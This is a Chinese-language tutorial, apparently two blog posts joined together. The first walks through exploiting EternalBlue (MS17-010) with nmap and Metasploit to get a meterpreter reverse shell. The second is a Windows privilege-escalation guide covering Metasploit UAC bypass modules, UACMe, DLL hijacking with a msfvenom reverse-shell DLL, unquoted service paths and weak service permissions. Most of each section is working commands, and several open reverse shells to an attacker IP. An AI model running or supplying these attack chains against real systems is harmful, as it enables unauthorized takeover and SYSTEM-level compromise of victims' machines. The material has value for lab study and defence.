基礎知識介紹：

1.何為永恒之藍？

永恒之藍（Eternal Blue）爆發于2017年4月14日晚，是一種利用Windows系統的SMB協議漏洞來獲取系統的最高權限，以此來控制被入侵的計算機。甚至于2017年5月12日， 不法分子通過改造“永恒之藍”制作了wannacry勒索病毒，使全世界大范圍內遭受了該勒索病毒，甚至波及到學校、大型企業、政府等機構，只能通過支付高額的贖金才能恢復出文件。不過在該病毒出來不久就被微軟通過打補丁修復。

2.什么是SMB協議？

SMB（全稱是Server Message Block）是一個協議服務器信息塊，它是一種客戶機/服務器、請求/響應協議，通過SMB協議可以在計算機間共享文件、打印機、命名管道等資源，電腦上的網上鄰居就是靠SMB實現的；SMB協議工作在應用層和會話層，可以用在TCP/IP協議之上，SMB使用TCP139端口和TCP445端口。

攻擊步驟：

一、確定攻擊目標

1.1使用kali打開nmap掃描目標主機。

使用nmap執行命令 nmap -sS -A 192.168.17.149

-sS（使用SYN掃描）,-A(啟用操作系統檢測和版本檢測)。

1.2根據我們的掃描結果可以大致判斷該系統可能存在永恒之藍漏洞。

二、攻擊步驟

2.1執行命令msfconsole打開metasploit。

2.2執行命令 search ms17_010 查詢我們所需要的攻擊模塊。

2.3找到我們需要的攻擊模塊后執行命令,

use exploit/windows/smb/ms17_010_eternalblue

2.4執行命令 search payload 查找我們需要的payload。

2.5接下來我們利用該payload

執行命令 set payload windows/x64/meterpreter/reverse_tcp。

2.6執行命令 show options 來查看我們所需要設置的參數。

其中RHOSTS（被攻擊計算機IP）和LHOST（自己kali IP）是需要自己設置。

2.7執行命令：set LHOST 192.168.17.148，set RHOSTS 192.168.17.149即可。

2.8在設置好一切之后只需要執行命令 exploit 即可自動開始攻擊。出現截圖中的回顯時就表示已經攻擊成功了。

2.9我們只需要執行help即可查看我們能夠執行哪些操作。

最后我們執行了 meterpreter > screenshot 對被攻擊對象進行了屏幕截圖測試。

1. 前言

??關于Windows提權應該這篇總結完就結束了，再次提醒一下關于第三方軟件或插件提權，不是不寫，而且有些軟件都會自動更新，很多漏洞基本上很少遇到，同時也利用不了，比如說：向日葵有一個版本能夠提權，但是現在那個版本裝再電腦上，根本連接不上向日葵的服務器，更何談提權呢，同時還可以看日志，目前日志也更改了，端口不會再日志中出現了。

??前面幾篇文章我就匯總在下面了，同時關于UAC提權之前一篇文章寫的沒那么細，這里重新補充一下。

??Windows權限提升—令牌竊取、UAC提權、進程注入等提權

??Windows權限提升 —SQL Server/MSSQL數據庫提權

??Windows權限提升—MySQL數據庫提權

??Windows權限提升—溢出提權

2. UAC提權

??UAC(User Account Control，用戶賬號控制)是微軟為了提高系統安全性在Windows Vista中引入的技術。UAC要求用戶在執行可能影響計算機運行的操作或在進行可能影響其他用戶的設置之前，擁有相應的權限或者管理員密碼。UAC在操作啟動前對用戶身份進行驗證，以避免惡意軟件和間諜軟件在未經許可的情況下在計算機上進行安裝操作或者對計算機設置進行更改。

??在Windows Vista及以后的版本中，微軟設置了安全控制策略，分為高、中、低三個等級。高等級的進程有管理員權限；中等級的進程有普通用戶權限；低等級的進程，權限是有限的，以保證系統在受到安全威脅時造成的損害最小。在權限不夠的情況下，訪問系統磁盤的根目錄、Windows目錄，以及讀寫系統登錄數據庫等操作，都需要經常UAC(User Account Control，用戶賬號控制)的認證。

2.1. UAC設置

• 始終通知：這是最嚴格的設置，每當有程序需要使用高級別的權限時都會提示本地用戶
• 僅在程序試圖更改我的計算機時通知我：這是UAC的默認設置。當本地Windows程序要使用高級別的權限時，不會通知用戶。但是，當第三方程序要使用高級別的權限時，會提示本地用戶
• 僅在程序試圖更改我的計算機時通知我(不降低桌面的亮度)：與上一條設置的要求相同，但在提示用戶時不降低桌面的亮度
• 從不提示：當用戶為系統管理員時，所有程序都會以最高權限運行

2.2. MSF繞過UAC

??這里我就不演示如何設置監聽與生成木馬了，在前面的文章中都提到相關的操作。

2.2.1. Windows7系統案例

??這里是基于默認等級的哦，如果被設置為最高的話，那就涼涼了，因為需要人為去點擊，但是我們正常需要提權都是由于我們獲取的權限太低，或者遠程桌面打不開，你如何去點擊，都無法點擊了，何談提權。

2.2.1.1. UAC狀態

??這里的UAC狀態是默認，也就是中等級別，至于打開這個UAC可以在運行框中輸入"msconfig",然后工具一欄就能看到更改UAC設置。

??一般UAC關閉的情況下使用getsystem就能夠提權成功。

2.2.1.2. 嘗試getsystem提權

??這里在嘗試使用getsystem提權，發現無法提權，那么就需要使用UAC進行繞過了。

background ##將會話置于后臺，不然會在使用bypass的找不到會話。

2.2.1.3. 搜索UAC繞過bypass方式

??這里能夠看到有很多的UAC繞過的bypass方式，但是這里面是分不同Windows版本的，有的可能在Windows7上能用，有的可能就不能用，不過最好選擇日期靠近的，這樣成功率大一點。

search uac ##搜索

2.2.1.4. 嘗試使用UAC繞過提權

use exploit/windows/local/bypassuac ##選擇bypass
sessions ##選擇會話
set session 1 ##設定會話
set lport 5555 ##設定反彈端口，這里不設置也可以，但是有時候直接反彈回來，會出現反彈不成功的情況。
run ##執行

2.2.1.5. 查看反彈效果

??通過反彈回來的效果能夠看到，成功提權了。

2.2.2. Windows10系統案例

??這里還是使用默認的UAC等級進行提權。

2.2.2.1. 嘗試getsystem提權

??可以看到，這里同樣是提權失敗。

2.2.2.2. 嘗試使用UAC繞過提權

??這里我也是嘗試了好幾個bypass才成功的，環境不同，可能使用到的bypass也是不同的，有些bypass需要也能提權，但是需要點擊確定，所以多嘗試嘗試。

use exploit/windows/local/bypassuac_silentcleanup ##選擇模塊
sessions ##選擇會話
set session 5 ##設置會話
set lport 6666 ##設置監聽端口
run ##執行

2.2.2.3. 查看反彈效果

??這里能夠看到是成功提權了。

2.3. UACMe工具繞過UAC

??這里我就不搭建WEB環境了，UACMe提取可以在低權限的時候提權，但是同樣在UAC設置為高的時候同樣也是無法進行直接提權的，需要人為的去點擊確定才可以。

??UACMe工具涵蓋了Windows7-11以及server服務器系統均可以提權。

??同時這里我就演示個Windows10系統的，至于Windows7肯定要比Windows10好提權。

2.3.1. 下載鏈接

注意想要使用這個工具需要對其進行編譯成功.exe文件，而我這里沒有最新的.exe文件，這里給個老版的，但是也沒差到哪里去，具體使用的介紹建議去GitHub上自己看。

??UACMe：GitCode - 開發者的代碼家園

??百度網盤UACMe：https://pan.baidu.com/s/1Tt-s2kluGJTr0hGwFR6y7w?pwd=86lm

提取碼：86lm

2.3.2. Windows10系統案例

??這里在下載完UACMe的時候，里面會有兩個exe執行文件，一個是32位的，一個是64位的，按照不同的系統位數，放入不同的exe文件進行執行。

2.3.2.1. 系統內操作

??注意這里彈出的窗口只是演示，在實際的環境中，我們無法登錄桌面，可以使用改工具去運行木馬后門，讓其上線即可。

??至于編號，新版的UACMe里包含70余種，可以一個一個嘗試。

語法：Akagi64.exe 編號

2.3.2.2. 反彈上線

??這里同樣我們監聽一下端口，并且利用工具進行反彈上線。

語法：Akagi64.exe 編號 后門程序地址

2.3.2.3. 查看權限

??這里反彈上來的可能還是普通管理員權限，這里可以使用getsystem進行再次提權，可以看到成功提權。

3. dll劫持提權

3.1. Windows10系統案例

??Windows 程序啟動的時候需要 DLL。如果這些 DLL 不存在，則可以通過在應用程序要查找的位置放置惡意 DLL 來提權。通常，Windows 應用程序有其預定義好的搜索 DLL 的路徑。

??它會根據下面的順序進行搜索：

1、應用程序加載的目錄
2、C:\Windows\System32
3、C:\Windows\System
4、C:\Windows
5、當前工作目錄 Current Working Directory，CWD
6、在 PATH 環境變量的目錄（先系統后用戶）

??程序運行一般會加載系統dll或本身程序自帶的dll，如果我們將程序執行時需要加載的dll文件替換成程序，那么我們下次在啟動程序時所加載的dll就是我們替換的那個木馬程序了。

3.1.1. 收集進程加載的dll

??這里會出現一個問題，沒有遠程桌面我們如何收集，這里其實有個很簡單的辦法就是，通過上線普通木馬后，看看能不能查看有存在哪些服務，然后找到相關服務本地安裝，安裝后使用火絨劍等工具進行查找加載的dll文件即可。

??像系統文件加載的dll我們是動不了的，我們一般能懂的都是未知文件和數字簽名文件。

3.1.2. MSF制作dll木馬

??這里我們選中libeay32.dll文件，我們就制作這個木馬。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.20 lport=5566 -f dll >libeay32.dll

3.1.3. 替換dll文件

??這里將生成的dll文件替換原本的dll。

3.1.4. 運行軟件

??運行軟件，不過需要注意的是，在實際環境中由于我未獲取到桌面權限，所以需要等待管理員去運行，同時由于我們替換了dll文件，所以會導致管理員在運行軟件的時候會出現無響應的情況，這時無法保證，管理員會卸載重新安裝。

3.1.5. 設置監聽

??這里設置監聽，當管理員去運行軟件的時候就會上線，像上面提到的，當軟件不能用了，無法保證管理員不會卸載重裝或者重啟電腦，所以在獲取權限后需要及時的移植到其它進程上面。

??可以看到的是成功上線了。

3.1.6. 提權

??我這里沒有提權成功，可能是由于系統問題，但是調試了半天也沒成功，這也能夠證明不是所有提權方式都是能夠百分比提權成功的，這里也只是演示，可以用這個方式進行提權。

3.2. Windows2012系統案例

??前面的分析與劫持等步驟就不在贅述了，直接看案效果把。

??可以看到這里使用Windows2012就能夠成功提權，所以之前提到的有些提權方式是根據不同系統可能有不同的效果。

4. 不帶引號服務路徑配合

??注意提權方式和操作系統版本等都沒有任何關系。

??當Windows服務運行時，會發生以下兩種情況之一。如果給出了可執行路徑，并且引用了完整路徑，則系統會按字面解釋它并執行。但是，如果服務的二進制路徑未包含在引號中，則操作系統將會執行找到的空格分隔的服務路徑的第一個實例。

??不過這個確實局限性還是很大的，比如虛擬機中沒有找到這樣的情況，實體機沒有找到，客戶現場機器也沒找到…同時還有一個問題是就算有，很多都是在C盤中，如果基本權限不夠大，那么也涼涼，也用不了。

4.1. 介紹案例

??這里的圖片我借用一下其它博客的，由于我自己電腦以及其它電腦，虛擬機都沒有這樣的路徑。

次序執行
c:\program.exe
c:\program files.exe
c:\program files (x86)\grasssoft\macro.exe
c:\program files (x86)\grasssoft\macro expert\MacroService.exe

4.2. 查看系統中錯誤配置的路徑

??而通過下面的語句可以判斷系統中是否存在這類問題，這里找到不代表就一定會存在問題，你看下面的圖片明顯無法進行替換。

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\" |findstr /i /v """

4.3. 生成木馬

??這里由于我的虛擬機中并沒有這樣的路徑，而且不好模擬，所以這里主要就是將一下流程，我們就按照第一張圖片上的案例來演示。

c:\program files (x86)\grasssoft\macro expert\MacroService.exe ##獲取到存在問題的路徑

??上面是獲取到的錯誤路徑，這里我們可以看到空格是在c:\program后面，那么我們生成一個木馬，然后將木馬名字改為：program.exe，并且發入C盤的根目錄下。

??這里放入C盤的原因是，服務器進行重啟的時候，會按照上面的路徑去尋找，而第一步就是找到C盤，同時又沒有引號，那么當遇到program.exe的時候就會執行。

4.4. 重啟服務

??這里只需要讓服務重啟就可以了，不過這里同時遇到一個問題就是，當實際環境中是需要管理員去重啟服務，或者重啟服務器的時候啟動，這樣才能上線，不過一般這個上線就是system權限。

??這里我就不演示了，主要沒有那個條件，整體的流程就是這樣的。

5. 不安全的服務權限

??Windows服務有時被配置為與服務本身或與服務運行的目錄相關的弱權限。這可能允許攻擊者操縱服務，以便在其啟動時執行任意代碼，并將權限提升到SYSTEM。

5.1. 利用方式

??將服務的 binpath 更改為我們上傳的木馬文件路徑，以便在服務啟動時執行惡意代碼從而獲得system權限，這里可以利用accesschk.exe工具輔助實現。

??accesschk是一個windows系統配置檢查工具，用于查看文件、注冊表項、服務、進程、內核對象等的有效權限。該工具將有助于識別當前用戶是否可以修改某個服務目錄中的文件，由于它是微軟官方出品，我們將其上傳至靶機，執行不會受到阻礙。

5.1.1. 下載鏈接

AccessChk - Sysinternals | Microsoft Learn

5.2. 檢查服務權限

??這里將下載下來的工具上傳至靶機中，這里我使用Windows server2012做演示。這里我為了測試方便，直接在靶機中去操作，而實際環境中可能需要在webshell工具中去操作。

5.2.1. 繞過許可

??還需要注意的是第一次執行accesschk.exe會跳出一個提示窗口讓我們接受許可，我們執行命令繞過以自動接受。

accesschk.exe /accepteula

5.2.2. 查看權限

??檢測服務權限配置：執行命令檢測，檢測當前用戶可以操作的服務項，注意當前用戶操作的服務項，需要先判斷自己獲取到的權限是什么，然后去執行。

accesschk.exe -uwcqv "Administrators" *

5.3. 修改服務路徑指向

??這里通過修改服務路徑的指向來執行后門木馬程序的路徑。

sc config "napagent" binpath="C:Users\Public\Downloads\shell.exe"

5.4. 重啟服務

??注意這里設置完后，需要開啟監聽哦，然后重啟服務，但是在實際的環境中是需要管理員對服務進行重啟，需要等待的。

sc start napagent

5.5. 查看反彈

??我這里沒有像別人一樣反彈回來就是system權限，我又進行提權了一下，把權限提成system，如果能夠配合之前提到檢查哪些服務是system權限進行修改，可能效果會更改，當然也會存在局限性。

??同時也又可能是由于我選錯服務了，演示的時候可以多試試，或者百度搜一下對應的服務，找找相關的資料。

??同時還又一個問題就是，提權完的會話容易掉線，服務啟動不了后，系統再結束啟動后，就會離線，所以需要盡快遷移會話。